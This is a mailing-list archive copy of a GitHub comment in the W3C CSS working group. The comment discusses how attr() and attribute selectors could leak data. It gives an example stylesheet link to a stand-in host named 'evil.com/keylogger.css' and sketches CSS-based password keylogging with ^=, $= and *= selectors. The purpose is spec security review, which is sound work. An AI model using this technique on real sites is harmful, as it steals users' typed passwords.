- From: Xidorn Quan via GitHub <sysbot+gh@w3.org>
- Date: Thu, 22 Feb 2018 00:30:44 +0000
- To: public-css-archive@w3.org
> attr() can't be used for anything nefarious today Hmmm, if you can insert a sheet on a host you controlled, e.g. inserting `<link rel="stylesheet" href="https://evil.com/keylogger.css">`, then you can get calls purely via `background: url(attr(value))` in it. But that's probably harder in most cases, but who knows? > But then again, we already know that allowing people to run arbitrary CSS on your site is an XSS vector. It takes a little more effort than just running arbitrary script, but there have been several reasonable POCs written over the years. It's a bit surprised to me. I didn't think CSS could be used for XSS... Have we put anything about this in CSS spec somehow? > Weak password exfiltration might be reasonable, particularly since using a combination of `^=` and `$=` lets you cut the exponent in half, and using `*=` gives you the set of characters used. It's more than that, really. If you type the password, `$=` would almost record the whole password string as you type. It has pitfalls, e.g. it cannot record repeated characters, and it wouldn't work if you use arrow keys etc. to insert character before. But yeah, it's reasonable enough to shrink the search space significantly. -- GitHub Notification of comment by upsuper Please view or discuss this issue at https://github.com/w3c/csswg-drafts/issues/2339#issuecomment-367525977 using your GitHub account
Received on Thursday, 22 February 2018 00:30:47 UTC